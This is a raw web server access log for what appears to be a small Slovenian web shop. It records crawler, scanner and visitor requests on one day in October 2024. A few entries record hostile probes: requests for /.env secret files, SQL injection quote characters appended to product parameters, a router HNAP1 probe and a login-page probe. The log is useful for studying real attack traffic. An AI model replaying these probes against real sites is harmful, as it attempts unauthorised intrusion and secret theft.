66.249.66.43 - - [02/Oct/2024:05:33:26 +0200] "GET /info.php?sifra=50155&skupina=40 HTTP/1.1" 200 17512 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.203.210.146 - - [02/Oct/2024:05:44:24 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.120.115.119 - - [02/Oct/2024:06:34:52 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/4G Language/zh_CN"
167.94.146.50 - - [02/Oct/2024:07:09:34 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.146.50 - - [02/Oct/2024:07:09:38 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.50 - - [02/Oct/2024:07:09:38 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
197.46.223.83 - - [02/Oct/2024:07:24:04 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [02/Oct/2024:07:25:08 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:07:25:09 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
205.210.31.104 - - [02/Oct/2024:07:49:03 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
205.210.31.254 - - [02/Oct/2024:07:59:11 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [02/Oct/2024:08:24:09 +0200] "GET /info.php?sifra=1003031&skupina=44 HTTP/1.1" 200 18651 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.158.158.132 - - [02/Oct/2024:08:59:21 +0200] "POST /HNAP1/ HTTP/1.0" 400 - "-" "-"
205.210.31.203 - - [02/Oct/2024:09:10:13 +0200] "\x16\x03\x01" 200 20819 "-" "-"
205.210.31.203 - - [02/Oct/2024:09:10:13 +0200] "\x16\x03\x01" 200 20819 "-" "-"
41.37.74.141 - - [02/Oct/2024:09:25:46 +0200] "GET /" 400 474 "-" "-"
66.249.66.41 - - [02/Oct/2024:09:55:46 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:09:55:46 +0200] "GET /skupine.php?skupina=34&stran=2 HTTP/1.1" 200 25744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:10:40:04 +0200] "GET /info.php?sifra=D120IBBI&skupina=31 HTTP/1.1" 200 17806 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.81.167 - - [02/Oct/2024:11:16:49 +0200] "GET /slike/kosara-za-drva-kamin-pec.jpg HTTP/1.1" 200 9517 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
5.255.231.78 - - [02/Oct/2024:12:11:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
213.180.203.84 - - [02/Oct/2024:12:11:51 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.66.44 - - [02/Oct/2024:12:28:43 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.180.203.186 - - [02/Oct/2024:12:52:43 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.82 - - [02/Oct/2024:12:52:43 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
35.203.210.197 - - [02/Oct/2024:13:56:08 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
41.37.218.201 - - [02/Oct/2024:14:07:49 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [02/Oct/2024:14:49:04 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:14:54:04 +0200] "GET /info.php?sifra=13.078&skupina=34 HTTP/1.1" 200 17901 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:14:55:06 +0200] "GET /info.php?sifra=16.010&skupina=34 HTTP/1.1" 200 17884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.66.42 - - [02/Oct/2024:15:25:01 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:16:30:36 +0200] "GET /info.php?sifra=2RTO82&skupina=31 HTTP/1.1" 200 17770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:16:41:01 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.146.48 - - [02/Oct/2024:16:44:05 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.48 - - [02/Oct/2024:16:44:10 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/hdem_100HW_m.gif HTTP/1.1" 200 2850 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/160.gif HTTP/1.1" 200 2333 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/140.gif HTTP/1.1" 200 2573 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:44 +0200] "GET /slike/ HTTP/1.1" 200 40026 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:46 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
188.198.252.169 - - [02/Oct/2024:17:02:46 +0200] "GET /slike/ HTTP/1.1" 200 60773 "http://212.44.99.48/skupine.php?skupina=86&stran=2" "Mozilla/5.0 (Linux; Android 13; SM-A346B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
66.249.66.42 - - [02/Oct/2024:18:00:36 +0200] "GET /kontakt.php HTTP/1.1" 200 16457 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:18:11:48 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:18:36:34 +0200] "GET /skupine.php?skupina=31 HTTP/1.1" 200 25701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /kvadratek.gif HTTP/1.1" 200 99 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike2/vozicek_m2.gif HTTP/1.1" 200 549 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/50455_m.jpg HTTP/1.1" 200 3761 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/Slika20012-1m.jpg HTTP/1.1" 200 3837 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /dodaj_v_vozicek.gif HTTP/1.1" 200 1135 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/etrgovina2010%20004.jpg HTTP/1.1" 200 9599 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /slike/IMG_2249-3.JPG HTTP/1.1" 200 4389 "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /images/celica_desno.gif HTTP/1.1" 404 - "http://212.44.99.48/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
89.142.63.52 - - [02/Oct/2024:19:23:38 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/skupine.php?skupina=100&stran=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
66.249.66.43 - - [02/Oct/2024:19:30:36 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:19:30:36 +0200] "GET /info.php?sifra=15.042&skupina=34 HTTP/1.1" 200 17770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:19:41:49 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:19:41:49 +0200] "GET /info.php?sifra=043899&skupina=131 HTTP/1.1" 200 17213 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
159.203.25.199 - - [02/Oct/2024:19:59:51 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
159.203.25.199 - - [02/Oct/2024:19:59:51 +0200] "GET /" 400 474 "-" "-"
23.94.126.146 - - [02/Oct/2024:20:08:24 +0200] "GET /skupine.php?skupina=100%27&stran=3 HTTP/1.1" 200 13089 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
23.94.126.146 - - [02/Oct/2024:20:08:24 +0200] "GET /skupine.php?skupina=100&stran=3%27 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
92.249.48.232 - - [02/Oct/2024:20:14:49 +0200] "GET / HTTP/1.1" 400 226 "-" "curl/7.68.0"
207.46.13.230 - - [02/Oct/2024:20:31:53 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.22 - - [02/Oct/2024:20:31:55 +0200] "GET /kritine-etrg-01.jpg HTTP/1.1" 200 110374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:20:53:53 +0200] "GET /info.php?sifra=HDEM135%27&skupina=82 HTTP/1.1" 200 18635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
4.237.68.225 - - [02/Oct/2024:20:53:53 +0200] "GET /info.php?sifra=HDEM135&skupina=82%27 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:21:08:48 +0200] "GET /skupine.php?skupina=87&stran=2 HTTP/1.1" 200 26894 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.175.6.252 - - [02/Oct/2024:21:43:19 +0200] "GET /image/lgbg.jpg HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:23 +0200] "GET / HTTP/1.1" 200 20819 "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:28 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:32 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:35 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:37 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:45 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:47 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:54 +0200] "GET /login.rsp HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
85.175.6.252 - - [02/Oct/2024:21:43:56 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01"
198.235.24.64 - - [02/Oct/2024:21:46:29 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [02/Oct/2024:22:17:38 +0200] "GET /info.php?sifra=56151&skupina=100 HTTP/1.1" 200 17549 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:37:23 +0200] "GET /info.php?sifra=50151&skupina=100 HTTP/1.1" 200 17702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:37:24 +0200] "GET /info.php?sifra=50051&skupina=100 HTTP/1.1" 200 17603 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:37:24 +0200] "GET /skupine.php?skupina=100&stran=3 HTTP/1.1" 200 23317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:38:24 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:38:25 +0200] "GET /info.php?sifra=655139&skupina=54 HTTP/1.1" 200 17311 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:22:43:49 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:44:25 +0200] "GET /info.php?sifra=559510&skupina=100 HTTP/1.1" 200 17619 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.128.54.126 - - [02/Oct/2024:22:46:17 +0200] "GET /" 400 474 "-" "-"
178.128.54.126 - - [02/Oct/2024:22:46:18 +0200] "GET /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0"
178.128.54.126 - - [02/Oct/2024:22:46:22 +0200] "\x16\x03\x01\x01\v\x01" 400 226 "-" "-"
66.249.66.44 - - [02/Oct/2024:22:46:29 +0200] "GET /info.php?sifra=50451&skupina=100 HTTP/1.1" 200 17660 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:22:50:29 +0200] "GET /info.php?sifra=6202&skupina=54 HTTP/1.1" 200 17351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:22:50:30 +0200] "GET /info.php?sifra=1010690&skupina=54 HTTP/1.1" 200 17316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:22:53:26 +0200] "GET /info.php?sifra=HDEM125&skupina=82 HTTP/1.1" 200 19303 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:00:32 +0200] "GET /info.php?sifra=111.15.01&skupina=54 HTTP/1.1" 200 17409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
